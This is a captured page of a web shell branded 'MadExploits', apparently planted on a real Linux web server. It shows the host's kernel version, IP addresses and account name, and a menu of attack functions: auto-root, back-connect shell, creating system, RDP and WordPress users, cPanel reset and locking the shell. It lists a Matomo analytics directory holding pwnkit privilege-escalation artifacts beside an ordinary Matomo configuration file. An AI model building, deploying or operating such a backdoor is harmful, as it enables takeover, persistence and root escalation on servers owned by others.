Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 18.188.41.251
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
dpclient /
public_html /
analytics /
core /
Config /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
Cache.php
2.54
KB
-rw-r--r--
ConfigNotFoundException.php
299
B
-rw-r--r--
GeneralConfig.php
1.1
KB
-rw-r--r--
IniFileChain.php
19.04
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : GeneralConfig.php
<?php /** * Matomo - free/libre analytics platform * * @link https://matomo.org * @license http://www.gnu.org/licenses/gpl-3.0.html GPL v3 or later * */ namespace Piwik\Config; use Piwik\Config; class GeneralConfig { /** * Update Archive config * * @param string $name Setting name * @param mixed $value Value */ public static function setConfigValue($name, $value) { $section = self::getConfig(); $section[$name] = $value; Config::getInstance()->General = $section; } public static function getConfigValue($name, $idSite = null) { $config = self::getConfig(); if (!empty($idSite)) { $siteSpecificConfig = self::getSiteSpecificConfig($idSite); $config = array_merge($config, $siteSpecificConfig); } return $config[$name] ?? null; } private static function getConfig() { return Config::getInstance()->General; } private static function getSiteSpecificConfig($idSite) { $key = 'General_' . $idSite; return Config::getInstance()->$key; } }
Close